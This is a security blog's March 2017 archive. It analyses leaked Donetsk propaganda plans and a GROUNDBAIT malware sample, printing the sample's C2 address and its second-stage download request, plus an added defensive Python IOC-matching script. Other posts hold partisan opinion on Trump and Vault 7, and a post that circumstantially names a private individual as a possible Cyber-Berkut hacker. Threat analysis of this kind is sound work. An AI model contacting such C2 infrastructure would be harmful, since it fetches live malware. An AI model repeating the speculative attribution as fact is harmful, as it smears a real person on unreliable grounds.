Krypt3ia

(Greek: κρυπτεία / krupteía, from κρυπτός / kruptós, “hidden, secret things”)

Archive for March 2017

RULEAKS: Russian Media and Disinformation in Ukraine by the DNR-ONLINE


INTRODUCTION:

Back in December I located a dump of data on the darknet placed there by a hacker collective in Ukraine called RUH8. The dump is rather good sized and all of it comes from Russian-backed Ukrainian sources. RUH8 dumped one group in particular that I was interested in because I located a piece of malware in the email spool that, once run through the usual tests, showed to be something not widely seen before. I will cover the malware further down the article and will include IOCs, but once I harvested the email spool itself and began to get things translated, things got even more interesting.

Once I mirrored the site I got some help from <REDACTED> and set to work translating the emails and document attachments. The bulk of the dump is average emails concerning daily business, but a few began to tell a tale of the company that the emails came from and how it was in fact a Russian front organization created for propaganda in Ukraine and used to manipulate the populace in the Donetsk People’s Republic (the Russian separatist area of Ukraine) and those outside it, including in other countries.

Having all of this come to light just after the election win for Trump, and now coming out here in the midst of the Russian intervention and collusion investigations today, I thought this report would be prescient and give a rare insight into how the Russian propaganda machine works, how the intelligence apparatus of Russia works in this respect, and perhaps bring to light a new piece of malware for everyone to see.

THE LEAK:

The leak by RUH8 in the darknet consists of more than a few entities’ email spools as well as those of individuals that they have described as assets of Russia. In the case of this post the data comes from the domain dnr-online.ru. This is a media org in Ukraine that is Russian backed and, as I said before, caters to the Donetsk People’s Republic. Within the dump there are many documents covering the day to day, but five documents stood out amongst them all (frankly there are more to be analyzed, and one needs Russian speakers to translate them all) as being all things shady.

RUH8 is also the group that hacked and dumped “The Grey Cardinal’s” email spool as well. Having gone through that spool I did not find any malware of merit or anything that was new so I moved on in mirroring and checking for goodies. They keep adding content to the site too so I would expect eventually I will locate some more goodies in the future. Keep an eye on the blog for more when I find it. The Grey Cardinal though is an interesting figure and I recommend you all read up on him as well.

THE PROPAGANDA PLAN:

Right, well on to the good stuff! The following documents found in this dump show Russia’s machinations at propaganda in Ukraine, well, at least this small slice of it.

DOC1

From Translator: This talks about “anti-Russian hysteria” in the media and about disinformation and fake news that makes Russia look bad, and also that pro-Russian voices are accused of being agents of the Kremlin. To counter this, this document outlines a project to create a pro-Kremlin media campaign in the Ukraine that includes a budget for hiring journalists and buying equipment like computers and voice recorders, a budget for freelancers and “insiders”, website hosting, web administrators, editors, and advertising. The amounts — which are, for some reason, in US Dollars — are $9,250 for initial set-up expenses, and $38,280 ongoing costs. Those could be monthly costs — the salary of a full-time journalist is listed at $2,000, and that’s likely to be $2,000 a month. The editor in chief, who’ll be based in Kiev, will get $2,500 a month. Hey, their freelance budget is $6,000 a month!

DOC2

From Translator: This is a little disturbing, since it outlines how the anti-war movement in the Ukraine can be used for pro-Russian purposes. For example, the idea is to create a picture of the leaders in the Kremlin as corrupt power-grabbers who are using the war in eastern Ukraine to distract everyone from their own problems. Russia’s invasion of eastern Ukraine is just misinformation from Kiev. Sounds totally legit.

Oh, and I figured out why it’s all in US Dollars. Hah, this is funny. Way back when I was based in Russia — something like 20 years ago, when the Soviet Union had just collapsed — inflation was rampant. Stores had to change the prices on all their products several times a day! To deal with it, they all switched to using Dollars or Euros instead, the traitors! To fix the problem, instead of fixing the economy, the Russian government outlawed the use of foreign currencies on prices. So what the stores did was switch to using something called the “arbitrary unit” — which just happened to be worth as much as the dollar, by pure coincidence. Ever since then, this “arbitrary unit” has been the default price. It is particularly convenient during inflationary periods, or when dealing with local currencies in different republics. Plus, everyone knows what it means. So, in this document, they use the term “arbitrary unit” and in others, they seem to have just used the dollar symbol instead.

Also, I can confirm that the ongoing expenses are per month — they spelled that out in this budget.

So anyway, this is another juicy document. They’ve put together a budget for running a fake anti-war grassroots organization.

Initial costs are $79,200 for things like computer equipment, recruiting, registering domain names and getting business and media licenses, and website design. It’s interesting that in both this budget and the previous one I looked at, they’re careful to get all the permits and licenses in place. They might be trying to undermine the government of a foreign country, but at least they’ve got all their paperwork in order!
Then the ongoing expenses are $86,000 and include salaries for regular contributors and freelancers, salaries for editorial managers and copyeditors, a financial manager and their deputy, $2,000 for a lawyer, $20,000 for online advertising, and $10,000 for promotion on social media like Facebook and VKontakte (Russia’s LinkedIn).

They’re expecting 100,000 unique visitors a day on weekdays.

It’s interesting they note that they’ll be playing games with the tax status of their employees — like in the U.S., there’s a difference between paying people as staff (where the employer has to pay a chunk of the taxes) and as freelancers (where the poor schmuck has to pay for everything). Also, in Ukraine, folks living in the disputed territories don’t have to pay taxes. They’re saying that they can save 40% as a result of playing around with this, which they claim is common practice in the Ukraine.

So not only are they undermining a foreign government, but trying to avoid paying taxes while they do it! I don’t know which is worse.

Document docxk7EDEjG06i is a plan for creating a major national media outlet from scratch. It will take $347,640 in startup costs, and about $146,500 a month in ongoing expenses. Total costs, for an eight-month period, are $3.82 million, including advertising costs, and other related expenses. Again, they’re playing around with the taxes. And they’re expecting to get a quarter million visitors a day on weekdays.

This one also has a budget for protection against DDOS attacks. They estimate that this will cost $2,000 a month (including the site hosting itself).

They also plan to sell advertising here, and have an ad sales department, and the editor in chief’s salary will be $10,000 a month plus a share of the ad revenues.

That’s not too shabby… Then they’ve got some projections for costs and revenues after that first eight-month period, which is interesting for those of our readers who plan to launch an online magazine in the Ukraine…

DOC3

From Translator: This is super evil. I’m really impressed! The idea is to create a pro-European, anti-Russian website — with the underlying message that the Ukraine will be better off without those annoying eastern provinces, and let Russia have them, so that it can enjoy its wonderful European future without them dragging the country down. So, again, they have an editorial budget. $69,900 in setup expenses, $65,000 a month in ongoing expenses, and plans to reach 100,000 readers a day on weekdays.

DOC4

From Translator: This is a plan to create a news site to cover the conflict in the disputed territories, because people are hungry for war news. The idea is to make it seem objective and independent, but slip in a pro-Russian point of view. So they’ll use terms associated with anti-Russian reporting, but slant the coverage to make Ukraine look bad. Yicch. Startup expenses: $97,200, ongoing expenses: $126,500 per month, expected audience: 120,000 unique visitors a day during weekdays.

DOC5

From Translator: This is an analysis of the Ukrainian political system and how a lot of work is done by “shadow” organizations in government. There don’t seem to be any action items here.

DOC6

From Translator: This is an overview of the Ukrainian media climate, and on how anti-Russian it is, and blames Western advisers for some of it.

So here is the context from these documents from the translator for you…

From Translator: These emails seem to have been sent to Georgi Bryusov, who heads up Russia’s wrestling federation, and are in reference to a meeting with “PB.” I don’t know who “PB” is.

Bryusov then forwarded them on to Surkov.

So, how likely is this?

Well, I spent some time covering a similar conflict in Georgia, where there was also a “separatist” province, called Abkhazia, and the conflict there was used to put pressure on the Georgian government. Although it was supposed to be a purely local, homegrown movement, Abkhazia — which didn’t even have an airport — somehow had fighter jets and bombed Georgian-controlled areas with them. (I was in one of those areas with a group of UN observers while it was being bombed. Fun! The Georgians shot down one of the planes which … surprise, surprise! … turned out to have a Russian pilot inside.)

Russia also paid the operating costs for the Abkhazian press center, where I spent many a happy day. All international phone calls were free! I could call my editors anywhere in the world, and file stories about the brave Abkhazian rebels! They also fed us and provided us a place to sleep, and organized regular trips to the front lines where we could enjoy being shot at by the Georgians. They also showed us how well prisoners of war were treated and corpses of people killed by the Georgians and, allegedly, mutilated. (Though the Red Cross folks I talked to couldn’t confirm that the mutilations were real and not, say, the expected results of getting too close to an explosion.)

Anyway, the bottom line is that I do have personal experience of Russian spending gold to manipulate the media, in case anyone ever had any doubts that they were willing to do it.

As you can see from the commentary above (and you can read the documents yourself as well), the Russians set up a media company including websites and formulated plans to manipulate people toward the Donetsk People’s Republic and against a free Ukraine. I am still going through the dump looking for the bills for the domains mentioned as well and will run them through ThreatCrowd and other sources to see if they were used at all for malware C2 and propagation. Which brings me to the use of dnr-online as a C2. Interestingly enough, the site itself is not a C2, but it does have connectivity to other IP addresses and domains that are.

dnr-online.ru

WHOIS for dnr-online.ru

5.101.152.66

The archaeology of malware that talks to 5.101.152.66 is rather interesting. There’s a bit of everything bad attached to that one, to be sure, including that MrSweet address that is ransomware central. 5.101.152.66 belongs to beget.ru, which has quite a few dirty connections as well.

beget.ru WHOIS

beget.ru

Of course beget could be innocent enough, but as you can see there is enough of Mos Eisley in there to make one not want to get an account there and set up a site, right? I will continue to look into other domains within the networks that dnr-online bought as soon as I can locate the bills for them or the domain names, and that will be another post I am sure. What all of this tells you, though, is that the Russians have always been carrying out these kinds of active measures against people like those in Ukraine, as well as what they did to us in the election of 2016. This is not a one-time deal and certainly will not be the last one we shall see. In fact, the bots and the domains will continue to be set up by the likes of the SVR and GRU in hopes of manipulating the general populace toward the goals of the Putin regime until its demise.

… and likely past it.

THE MALWARE & GROUNDBAIT:

Right! Now on to the other interesting bit found in the dump from dnr-online. In looking at the spool I dumped all attachments into a folder and began checking them for malware: all the Word docs, Excel sheets, PowerPoints, etc. The docs all checked out, but one zip file had a .scr file in it that turned out to be malware. The file (Центр управления восстановлением ДНР справка-доклад за 13 октября 2015 года.exe), “Center for Recovery Management of the DNR certificate-report for October 13, 2015.exe”, came from an email coming in from a Russian source to the head of dnr-online. I am unable to source the headers of the email at this time, but the question becomes: was this malware sent to the DNR by RUH8, or was this malware sent to the DNR to send to others in some other campaign? I cannot say either way, but the malware is a new sample of GROUNDBAIT or Prikormka that was detected and reported on by ESET running rampant in Ukraine. Given that ESET claims that this malware was being used against the separatists in Ukraine, it stands to reason that the logic here is that the malware was to be used by the propaganda campaign against those it was seeking to manipulate. However, the nagging thing for me is the way this was passed around. The email has no real context in the text, and to me it seems to imply that it is a fix for things inside the DNR. My other thought is that maybe someone got hold of the GROUNDBAIT raw sample and re-used it by re-packing it and setting it against dnr-online.

An interesting notion…

I contacted ESET and talked a bit with the guy who did the work and he was.. Well.. Not so helpful. So here are the IOCs for this file for you all to look for.

IOCs

Filename: Recovery Control Center Help DNR-Report for October 13, 2015
Filetype: .exe
SHA256: f9a96ad58fb946981d196d653ec28fa31d6f946a7e2f6784b317dd9adc557b62 (AV positives: 52/57 scanned on 04/30/2016 07:33:42)
File raw: zip file: zipnh4dZDtMUk.zip

https://www.hybrid-analysis.com/sample/4eaf154ce8974228db6e35a1364337a12b821b73f052a44dc24ebdf0c1da6a4e?environmentId=100
https://virustotal.com/en/file/4eaf154ce8974228db6e35a1364337a12b821b73f052a44dc24ebdf0c1da6a4e/analysis/1484661011/


Dropped executables
“archive.rar” has type “gzip compressed data from NTFS filesystem (NT)”
“helpldr.dll” has type “PE32 executable (DLL) (GUI) Intel 80386 for MS Windows”
“samlib.dll” has type “PE32 executable (DLL) (GUI) Intel 80386 for MS Windows”
“rbcon.ini” has type “ASCII text with CRLF line terminators”

Writes directory archive.rar (exfil)

C2 connected: 185.68.16.35
Connects and downloads second stage: GET http://wallejob.in.ua/wd.php?sn=2120161230091201&rb=7&ob=R_pol_x&bt=0 HTTP/1.1

https://www.threatcrowd.org/ip.php?ip=185.68.16.35
https://www.threatcrowd.org/malware.php?md5=7accb6fed266a2023659f438ad1b3546
domain:      wallejob.in.ua
descr:       Domain registered for customer of Ukraine.com.ua
admin-c:     UKRAINE-UANIC
tech-c:      UKRAINE-UANIC
status:      OK-UNTIL 20170619000000
nserver:     ns114.inhostedns.com
nserver:     ns214.inhostedns.net
nserver:     ns314.inhostedns.org
mnt-by:      UKRAINE-MNT-INUA
mnt-lower:   UKRAINE-MNT-INUA
changed:     hostmaster@ukraine.com.ua 20160907200219
source:      INUA

Found malicious artifacts related to “185.68.16.35” (ASN: , Owner: ): …
URL: http://wood-house.com.ua/ (AV positives: 2/68 scanned on 12/27/2016 16:55:43)
https://www.threatcrowd.org/domain.php?domain=wood-house.com.ua

URL: http://wallejob.in.ua/ (AV positives: 5/68 scanned on 11/17/2016 02:10:28) <—GROUNDBAIT C2
https://www.threatcrowd.org/domain.php?domain=wallejob.in.ua
https://www.hybrid-analysis.com/sample/319e9dc36678c4d774ba0765ec93d3160bd476ab0f98bac1b7e5b92e7994a88a/?environmentId=1

URL: http://zarabatak.ru/ (AV positives: 1/68 scanned on 07/20/2016 10:59:29)
https://www.threatcrowd.org/domain.php?domain=zarabatak.ru

URL: http://psh.co.ua/ (AV positives: 1/68 scanned on 07/14/2016 04:35:37)
https://www.threatcrowd.org/domain.php?domain=psh.co.ua

URL: http://sem-dev.co.ua/ (AV positives: 1/68 scanned on 07/14/2016 04:33:23)
https://www.threatcrowd.org/domain.php?domain=sem-dev.co.ua

wood-house.com.ua
domain:           wood-house.com.ua
dom-public:       NO
registrant:       xdkjv649
mnt-by:           ua.intermedia
nserver:          ns311.inhostedns.org
nserver:          ns211.inhostedns.net
nserver:          ns111.inhostedns.com
status:           ok
created:          2014-11-07 13:31:27+02
modified:         2016-11-03 16:37:39+02
expires:          2017-11-07 13:31:27+02
source:           UAEPP

registrar:        ua.intermedia
organization:     SE Rabotnov Volodymyr
organization-loc: ФОП Работнов Володимир Володимирович
url:              http://names.com.ua
city:             Melitopol
country:          UA
source:           UAEPP

contact-id:       xdkjv649
person:           Vladimir V Rabotnov
person-loc:       Работнов Владимир Владимирович
e-mail:           not published
address:          not published
address-loc:      not published
phone:            not published
mnt-by:           ua.intermedia
status:           ok
status:           linked
created:          2013-04-05 15:01:02+03
modified:         2014-01-08 23:42:17+02
source:           UAEPP
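As an added example, not part of the original post: a small Python sweep that checks proxy log lines and an endpoint file listing against the IOCs listed above (the C2 host and IP, the second-stage beacon to /wd.php, the dropped file names and the sample hash). The log layout, the file listing and all values other than the IOCs quoted in the post are constructed here; matching on the beacon’s parameter shape is an assumption made so that the same beacon to a not-yet-known host still surfaces for hunting.

```python
"""IOC sweep for the GROUNDBAIT/Prikormka sample described in the post.

Checks (1) proxy log lines for the second-stage beacon
    GET http://wallejob.in.ua/wd.php?sn=...&rb=...&ob=...&bt=...
and the C2 address 185.68.16.35, and (2) an endpoint file listing for the
dropped file names and the sample hash. Log format and file listing are
constructed for this example; the IOC values come from the post.
"""
import ntpath
import re
from urllib.parse import urlparse, parse_qs

# IOC values quoted in the post.
C2_HOSTS = {"wallejob.in.ua"}
C2_IPS = {"185.68.16.35"}
SAMPLE_SHA256 = {"f9a96ad58fb946981d196d653ec28fa31d6f946a7e2f6784b317dd9adc557b62"}
DROPPED_FILES = {"helpldr.dll", "samlib.dll", "rbcon.ini", "archive.rar"}

# Shape of the beacon request seen in the sandbox run. Matching on the shape
# (path plus this exact parameter set) is an assumption made here so that the
# same beacon to a not-yet-known host is still surfaced for hunting.
BEACON_PATH = "/wd.php"
BEACON_PARAMS = {"sn", "rb", "ob", "bt"}


def classify_url(url):
    """Return the list of IOC rules a URL trips (empty list if clean)."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    reasons = []
    if host in C2_HOSTS:
        reasons.append("c2-host")
    if host in C2_IPS:
        reasons.append("c2-ip")
    if parsed.path == BEACON_PATH and set(parse_qs(parsed.query)) == BEACON_PARAMS:
        reasons.append("beacon-shape")
    return reasons


# Constructed proxy log layout: "<timestamp> <client-ip> <status> <method> <url>".
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<status>\d{3})\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)"
)


def scan_proxy_log(lines):
    """Return one hit dict per log line whose URL trips an IOC rule.

    The 'sn' parameter is kept because it is the value the implant sends to
    identify itself to the C2, which lets you correlate beacons across
    clients and days.
    """
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line; skip rather than fail the sweep
        reasons = classify_url(m["url"])
        if not reasons:
            continue
        query = parse_qs(urlparse(m["url"]).query)
        hits.append({
            "ts": m["ts"],
            "client": m["client"],
            "url": m["url"],
            "reasons": reasons,
            "sn": query.get("sn", [None])[0],
        })
    return hits


def check_file_listing(listing):
    """listing: iterable of (path, sha256). Return (path, why) for each match."""
    matches = []
    for path, digest in listing:
        name = ntpath.basename(path).lower()  # ntpath splits Windows paths on any OS
        if digest.lower() in SAMPLE_SHA256:
            matches.append((path, "sample-sha256"))
        elif name in DROPPED_FILES:
            matches.append((path, "dropped-file-name"))
    return matches


# Constructed sample data. The first URL is the beacon quoted in the post;
# the other lines are made up to show a C2-IP hit and a shape-only hit.
SAMPLE_LOG = """\
2016-12-30T09:12:01Z 10.0.0.15 200 GET http://wallejob.in.ua/wd.php?sn=2120161230091201&rb=7&ob=R_pol_x&bt=0
2016-12-30T09:12:05Z 10.0.0.15 200 GET http://example.com/index.html
2016-12-30T09:13:40Z 10.0.0.22 404 GET http://185.68.16.35/wd.php?sn=0000000000000002&rb=7&ob=R_pol_x&bt=1
2016-12-30T09:14:02Z 10.0.0.31 200 GET http://unknown.example/wd.php?sn=1&rb=2&ob=x&bt=0
""".splitlines()

SAMPLE_LISTING = [  # constructed paths; digests other than the sample hash are dummies
    (r"C:\Users\user\AppData\Local\Temp\helpldr.dll", "0" * 64),
    (r"C:\Users\user\Downloads\report.exe",
     "f9a96ad58fb946981d196d653ec28fa31d6f946a7e2f6784b317dd9adc557b62"),
    (r"C:\Windows\System32\kernel32.dll", "1" * 64),
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
    for path, why in check_file_listing(SAMPLE_LISTING):
        print(why, path)
```

The shape-only hit on the unknown host is the one worth a second look: it may be a new C2 or a false positive, so confirm it before blocking.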

TYING IT ALL TOGETHER:

So what we have here is the insider’s view of how dnr-online, a propaganda wing within Ukraine’s Donetsk People’s Republic, put together media services and planned to use them as a framework for Russian propaganda in the region. We also have malware that is known to be actual spycraft in the region within its mail spool, being passed around to at least two sources inside, one of them being the director of the DNR company. Was that malware meant to infect and eventually allow for the dump in the darknet, or was the malware being passed along for other uses that we cannot see in this spool dump? In either case this information makes it clear that in Ukraine the Russian propaganda and espionage machines are alive and well and using the net as a force multiplier at the very least.

I will continue looking at the growing dumps by RUH8 and let you all know about any malware and goodies that pop up. It is also of interest that this dump has been around and certain groups have looked at it and just sort of said “Nothing to see here,” which is interesting to me. I mean, malware that no one has really seen and plans for propaganda in the region are of no interest? I guess maybe these groups just did not want to spend the cycles on looking deeper into the data. I actually did, with the help of others, as well as checking the forensics on the metadata to ensure the stuff was real.

…but that’s just me… I am not a churnalist.

Oh well..

More when I have it.

K.

UPDATE!: One day after this report one IP address involved as a nexus of malware has changed its domain name! Coincidence? Hmmmm?

Screenshot from 2017-03-29 06-14-33

Written by Krypt3ia

2017/03/28 at 13:00

Cyber-Berkut Joining The Manafort Fray


Cyber-Berkut, a Russian-leaning alleged hacker collective in Ukraine, decided to weigh in on the whole Manafort debacle with a data dump. The dump unsurprisingly is pro-Russian and attempts to paint the US as trying to manipulate things and make it look like Manafort is guilty. Berkut does this by dropping a Word doc and a couple of PDFs that they claim make a case for the State Department trying to discredit Manafort’s efforts in Ukraine on Russia’s behalf. It is rather amusing and ineffectual really, but I had to take a closer look because they claimed to have hacked these documents. The documents look legit, but there is no source on these as to where they were hacked from, if hacked at all, and no other dump to confirm a hack of any merit.

They try to link Leshenko to all of this. Leshenko too was alleged to have been the hacker in the Manafort cell phone hack and extortion. Same actor?

Now Berkut doing this is not new really, but most of the time they spend their time attacking the Ukrainian factions who reside outside of Donetsk and want a free country, not those who want Russian rule. In the past this group has hacked and DDoS’d sites, but this one, weak as it is, caught my attention just because Manafort is now in the hot seat over Russian ties to oligarchs who are close to Putin while he was running the Trump campaign, so one tends to want to dig. In looking at Berkut and their history, others have claimed that they are part of the Fancy Bear group, and attempts have even been made to link them to the cutout Gucci-fer (Gucci, like Gianni, and Fur, like… Fur.. Not GOOSIFUR) and DNCLeaks as well. These are somewhat tenuous reports from what I saw out there, but it made me want to dig a little more into them.

Berkut showed up in or around July 2014, with sites being created on numerous domains since. Most of these sites had been registered privately, negating personal information, but several of them from the time of first creation have one name attached to them: Aleksandr Panchenko. An Aleksandr Panchenko does live in Ukraine and does in fact work in tech, and may fit the bill as the originator of the sites. The email address used for each of these, alex_panchenko@mail.com, does not really exist, and the addresses used are bogus as well, so there is not much to go on other than a name, but let’s get back to those pesky and numerous domains, eh?

CYBER-BERKUT.SU
CYBER-BERKUT.TK
CYBER-BERKUT.RU
CYBER-BERKUT.COM
CYBER-BERKUT.INFO
CYBER-BERKUT.BIZ
CYBER-BERKUT.CENTER
CYBER-BERKUT.ORG
CYBER-BERKUT.US
CYBER-BERKUT.ME
CYBER-BERKUT.CZ
CYBER-BERKUT.IM

It seems that whoever created these sites (including a defunct darknet site) really wanted to get information penetration maxed out. Many of the sites still work and others have been decommissioned, and the domains are up for sale. In each case, though, they were created anonymously with domain registrations all over the world, except for the six or seven I located with early creation dates going back to 2014. Is this because this Aleksandr created them without figuring out what he was doing with them? Or were these created with that name as a means to an end, to mislead people? If in fact Berkut is just an anonymous wannabe hacker group aligned with the Russian state, then maybe this guy just figured that historical WHOIS costs money and, once long enough goes by, no one pays attention? If it is the other case, where someone is using his name, why be so consistent with it? Does someone hold a grudge, or is this a famous person whose name they are just using? I started looking around to see, and here’s what I came up with.

Aleksandr Panchenko 1: Mathematician currently studying in Germany on Phd

Aleksandr Panchenko 2: Chessmaster (deceased)

Aleksandr Panchenko 3: 32 year old living in Kyiv Ukraine whose profession is in computers (Oracle Dev, Unix Admin etc)

Aleksandr Panchenko 4: Wedding Photographer in Kyiv Ukraine

There were others but you get the sense that the name Aleksandr Panchenko in the Baltics is kinda like John Lee in China if you catch my drift. Though, that one guy, the one with all the technical experience does kinda stand out right? That is someone who has the technical chops to do some hacking and dumping as well as run sites right? It is all way circumstantial but I for one, if I were the FBI say, might go look this guy up and ask em a few questions. After all, the Berkut has been naughty and attacked us as well as others in the wider internet world.

The Manafort intersection though still interests me. I wonder if they will continue on trying to muddy the waters now that Manny has decided he will testify in front of Congress. As the shoes of the millipede keep dropping I am sure that the RU factions will try to drop chaff on things to confuse everyone. I will keep an eye on the site(s) to see if they dump anything else of interest but for now just take a gander at these files and the results of the searches…

Doc 1

Doc 2

Doc 3

K.

Written by Krypt3ia

2017/03/24 at 18:24

Posted in Disinformation

Fabricator


I have been ruminating lately on our situation regarding aspects of Russian interference (active measures) and the new President of the United States. In previous posts I have delved into the Wilderness of Mirrors of counterintelligence that we find ourselves in today, as well as some other musings on motives that the Russians and the President (and his minions) may have in relation to their actions. Today though, on the morning of the big Comey interview in Congress, I would like to cover the fabricator. By fabricator I mean the intelligence term and not the guy who makes something on the line at the local plant. A fabricator, in the parlance of spies, is someone who lies, inventing stories and half-truths in order to mislead intelligence operations. More to the point, I would like to submit that in the goings on today you will have to ponder whether or not the president and his minions are all fabricators acting in whatever interest they have against us all.

Fabricators have motives just like any other liar but here are the defined reasons in the intelligence definition:

  • Fanaticism or ideology is often cited as the key reason behind fabricator activity. When fanaticism is involved or ideology becomes stronger than morals, fabrication may then be seen as a reasonable means to an end. The fabricator may invent the fake intelligence to help bring about a specific outcome to a situation.
  • Mental illness, such as confabulation, often combined with alcoholism, causes some individuals to fabricate intelligence, most often done as part of a fantasy of being a secret agent or to gain official attention.
  • Money is a strong incentive for some fabricators. Often, a reliable intelligence source agent will become a fabricator because of financial problems or greed. When the agent no longer has valid intelligence to sell to the conducting intelligence officer, the agent may decide to sell fabricated intelligence in order to satisfy need or greed. (Source: Wikipedia)

As you can see these are not so different from any other liar; however, in the context of the intelligence world and what we see playing out today, all of them could also easily fit the President’s and the White House’s machinations of late. Many have speculated already on all of these with regard to Trump and his coterie of minions in the White House today. I would put it to you here that all of these are likely, but money and fanaticism are two of the key players here, with a healthy helping of political expediency. While Trump seems to be in his own reality much of the time, his outright lying and cognitive dissonance have multiple purposes. I would say that he has all of these factors: the mental illness (narcissism), the desire for money and power (money), and a fanaticism that he wears like a cloak to keep him in the seat of power, using a base that he may not in fact truly believe in but needs for support to win. I would say that this was a thumbnail of his campaign and of what we are seeing now as he is running the country.

Looking back, I would say the one biggest tell has been his claims of the Obama admin “tapping his wires” at Trump Tower during the election. Trump used this, as he does many other outrageous claims by Tweet, to distract everyone. He is specifically distracting the media from looking at the real problem at hand (e.g. Russian ties between himself and his coterie and the monies involved) in what I am calling a WMD attack (Weapon of Mass Distraction) via early-morning Tweet storms. As we have seen with the claim of wiretapping, there is no evidence, but he uses spin and word salad to confabulate and bamboozle the media and the populace into looking the other direction. I put it to you now that you can expect some other outbursts today or tomorrow, post the Comey hearing, in an attempt to spin things away from the connections that he and his people have with Russia.

Trump is a fabricator.

See through it.

K.

Written by Krypt3ia

2017/03/20 at 12:26

Posted in HUMINT

Vault 7


See Robert Redford at the top of the page? He’s playing a character who was an intelligence analyst who read books for the CIA. He came back from getting lunch for his co-workers and found them all dead, killed by a rogue CIA operation that hired an outside freelance assassin to kill them all and cover up rogue operations. This is fiction, and YOU are not him. So please everyone just calm the fuck down about the Wikileaks Vault7 dump ok?

RIGHT! Well Wikileaks has done it again and released a dump of CIA exploits this time around. There are quite a few little gems in there and the hue and cry by the genpop has been idiotic as usual. My personal favorite was the epic fuckery around how the New York Times chose to say that some of the exploits “bypassed” the encryption of programs like Signal, which sent many an INFOSEC twitter account into a tizzy over “OMG IT ISN’T A BYPASS!” which, by the way, FUCKING CUT THAT SHIT OUT YOU SELF IMPORTANT FUCKWITS! The point of the statement is true: if the software in the Vault7 dump is used on someone’s phone then the CIA is BYPASSING the encryption altogether. For that matter they are bypassing the application altogether! So stop with the self important I AM A GOD DAMNED IMPORTANT PENTESTER AND THE SEMANTICS OF THE ARTICLE HERE ARE WRONG ERMEGERD!

Just stop.

The point of it all is that these tools, if used against you (until they are mitigated by patching and fixes to OSes), will make any precautions you take on those devices moot, ok? Arguing over the semantics of it all is just fucking stupid posturing, and if you expect the average person to understand what you are saying, then you are delusional, ok? Oh, and if you think that the average person is the target of these attacks, yep, you once again are delusional. Specifically, if you are a US person CONUS and you are just the average Joe the Plumber, you are NOT the target of the CIA.

Sorry.. I know it hurts your self image but it’s fucking true.

Get over yourselves.

Ok, so that rant is over; now let’s move on to other things about this dump. There’s a lot of technical stuff that will make the wonks masturbate for quite a long time, and that’s to be expected. However, I would like to talk about a few other side-loaded things happening that you should think about. First off, let’s talk about the dump itself and who dumped it. It seems from what I am seeing Assange saying that the dump was given to Wikileaks by an insider who wanted to open up discussion over the pervasive nature of these kinds of exploits against common and deeply penetrated systems in our collective lives. By this I mean cell phones, TVs and other IoT devices. Now most of the stuff in the dump looks to be from 2012 up to nearly 2016, so it is older in respect to 0day and hacking exploits in many ways. Since they were secret, though, and they took a lot of time to make sure there were bypasses as well as ways to hide their presence, the CIA’s stuff is still old from a certain standpoint. Within the community one has to offer up the idea that not everything stays secret, and those services that cover assets that the CIA might want to bug also have people who spend their time looking for such software, right? What I am saying is, who knows what has been working well and undetected and what has been detected by a foreign power and counteracted or allowed to run as a means of disinformation. Take that into consideration when you read the dump. Sure, the common man here in the world may not know about this stuff and it will blow their minds, but in the IC maybe not, ok?

Now let's consider how long this data has been in the hands of Wikileaks and who may have had it before. This stuff may have been in the community at large for a long time. The CIA may have shared this tech with FIVE EYES in some cases, but if you look at the headers much of it was NOFORN (Not Releasable to Foreign Nationals), so let's just assume it was inside Langley. If the data was common there, when did it get leaked originally? Who had it in the interim? This goes back to the paragraph above too. If the exploits were working, we now have to wonder whether an aware adversary was feeding them bad data (this will play a key part in the дезинформация (disinformation) part of this post later), given when we think the data was stolen and leaked. The fact of the matter is this, brass tacks: I don't believe a word Assange says from his balcony at Hacienda Ecuador, and my money is that this was not leaked by a CIA employee just because they had a change of heart. I personally believe that whoever leaked it is an asset of a foreign power and that power just might be Russia.

Which brings me to the issue of the quick disinformation spin-up by what looks to be Russian trolls and bots on Twitter and elsewhere over this last dump. The narratives that are starting to spin up aim this data directly at Democrats (including Hillary) and are meant to cause more friction within the country and our politics. Gee, who lately has been doing that, I wonder? The Daily Beast had a good report on this, and I agree with Rob that this has spun up way too quickly and with too much cohesion for it not to have been in the pipeline before the dump. My meaning is that, as we have seen in the recent past with the hack on the DNC and active measures on our electoral system, the Russians have a useful idiot in Assange and the Wikileaks organization. Assange has been another lackey of Putin like Trump, and in fact it is quite possible that the leaked data came from Russia by way of an asset inside the CIA. Which then makes a Russian mole hunt at Langley a very large possibility. I bet the polygraphers in Virginia are all warming up their electrodes as I write this.

So, while all you INFOSEC nerds wank off to the sploits just remember these salient points.

  • There’s a bigger more subtle game going on here
  • YOU are not that important so just take this stuff and work on how to fix it
  • Take a beat and remember YOU ARE NOT THAT IMPORTANT
  • The CIA is not chartered to work within the USA; these exploits were targeted at other countries. Just look at FINE DINING for case officers
  • Consider what exploits other countries have and are being used that you don’t know about
  • PENTESTERS ARE NOT FUCKING JAMES BOND. FOR FUCKS SAKE JAMES BOND IS NOT JAMES BOND!

Look at the bigger picture.

K.

Written by Krypt3ia

2017/03/08 at 13:48

Blowback

leave a comment »

Forty-odd days into the new presidency and Putin is already telling his media minions not to talk about Trump anymore. The reason? The going theory in the IC world is that Trump has become more unhinged and potentially uncontrolled by his possible handlers at the Kremlin. Personally I think that Putin is of two minds where this is concerned, and this post will try to explain the possible blowback for him as well as the potential benefits of an unhinged president and maybe an impeachment. This gambit by Putin worked so well, too well, that perhaps the Kremlin and the ops guys (psyops/active measures/Gerasimov) could not even have gamed this out fully to have counter moves or contingency plans here.

The hacking of the DNC and all the active measures surrounding the 2016 election cycle, from a strict operations standpoint, was a thing of beauty to behold. Yes, it was carried out on us, but as someone who appreciates a well planned out operation, this one was pretty well done. The American populace was ripe for this and the political system was in a state where just a simple nudge with the right assets started the great Rube Goldberg device moving, and it culminated in Trump winning the election. I will not cover the problems with our voting systems here, I have done so in other posts a while back, but let's just look at it from the higher levels of disinformation, shall we? The 'Fake News' thing was a perfect storm for the under-educated Facebook minions out there, and the very nature of social media was the Teflon-sprayed slug that deployed it all. From the churnalists and the disinfo operations out there, the sway and the echo chambering that happened allowed for a critical mass of Trump support that would in the end eke out the electoral win. This is a real feat given that three million or so more people voted for Clinton and the overall popular vote was easily hers. This was some math that I do not believe Putin and his intelligence community thought was a real possibility. I think they were as shocked by Trump's win as Trump was on the night of the election.

